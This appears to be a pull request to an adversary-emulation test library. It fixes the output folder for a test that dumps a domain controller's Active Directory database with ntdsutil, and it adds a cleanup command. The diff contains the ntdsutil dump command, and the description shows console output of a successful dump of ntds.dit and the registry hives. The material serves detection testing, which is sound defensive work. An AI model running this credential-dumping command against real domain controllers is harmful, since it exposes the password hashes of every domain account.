### PR TITLE
T1003.003: create empty folder for ntdsutil output and add cleanup command

### DIFF
--- a/atomics/T1003.003/T1003.003.yaml
+++ b/atomics/T1003.003/T1003.003.yaml
@@ -95,7 +95,7 @@ atomic_tests:
     output_folder:
       description: Path where resulting dump should be placed
       type: Path
-      default: C:\Windows\Temp
+      default: C:\Windows\Temp\ntds_T1003
   dependencies:
   - description: |
       Target must be a Domain Controller
@@ -105,6 +105,9 @@ atomic_tests:
       echo Sorry, Promoting this machine to a Domain Controller must be done manually
   executor:
     command: |
+      mkdir #{output_folder}
       ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
+    cleanup_command: |
+      rmdir /q /s #{output_folder}
     name: command_prompt
     elevation_required: true


### PR DESCRIPTION
**Details:**
target folder must be empty for ntdsutil export, which is unlikely the case for c:\windows\temp and then we get this error:
```
PS C:\Users\myadmin> Invoke-AtomicTest T1003 -TestNumbers 3
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing test: T1003-3 Windows Credential Editor
Done executing test: T1003-3 Windows Credential Editor
PS C:\Users\myadmin> Invoke-AtomicTest T1003 -TestNumbers 10
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing test: T1003-10 Dump Active Directory Database with NTDSUtil
ntdsutil: ac i ntds
Active instance set to "ntds".
ntdsutil: ifm
ifm: create full C:\Windows\Temp
*** Error: target folder C:\Windows\Temp is not empty.
ifm: q
ntdsutil: q
Done executing test: T1003-10 Dump Active Directory Database with NTDSUtil
```

I also added a cleanup command

**Testing:**
After patch:
```
PS C:\Users\myadmin> Invoke-AtomicTest T1003 -TestNumbers 10
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing test: T1003-10 Dump Active Directory Database with NTDSUtil
ntdsutil: ac i ntds
Active instance set to "ntds".
ntdsutil: ifm
ifm: create full C:\Windows\Temp\ntds_T1003
Creating snapshot...
Snapshot set {87a98278-4cc0-4a56-a35e-8eab0a6dda63} generated successfully.
Snapshot {c35dd43b-29ac-49c2-b15f-dda26498bda2} mounted as C:\$SNAP_202006261837_VOLUMEC$\
Snapshot {c35dd43b-29ac-49c2-b15f-dda26498bda2} is already mounted.
Initiating DEFRAGMENTATION mode...
     Source Database: C:\$SNAP_202006261837_VOLUMEC$\windows\NTDS\ntds.dit
     Target Database: C:\Windows\Temp\ntds_T1003\Active Directory\ntds.dit

                  Defragmentation  Status (omplete)

          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................

Copying registry files...
Copying C:\Windows\Temp\ntds_T1003\registry\SYSTEM
Copying C:\Windows\Temp\ntds_T1003\registry\SECURITY
Snapshot {c35dd43b-29ac-49c2-b15f-dda26498bda2} unmounted.
IFM media created successfully in C:\Windows\Temp\ntds_T1003
ifm: q
ntdsutil: q
Done executing test: T1003-10 Dump Active Directory Database with NTDSUtil

PS C:\Users\myadmin> Invoke-AtomicTest T1003 -TestNumbers 10 -Cleanup
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing cleanup for test: T1003-10 Dump Active Directory Database with NTDSUtil
Done executing cleanup for test: T1003-10 Dump Active Directory Database with NTDSUtil
PS C:\Users\myadmin>
```

**Associated Issues:**
Didn't create one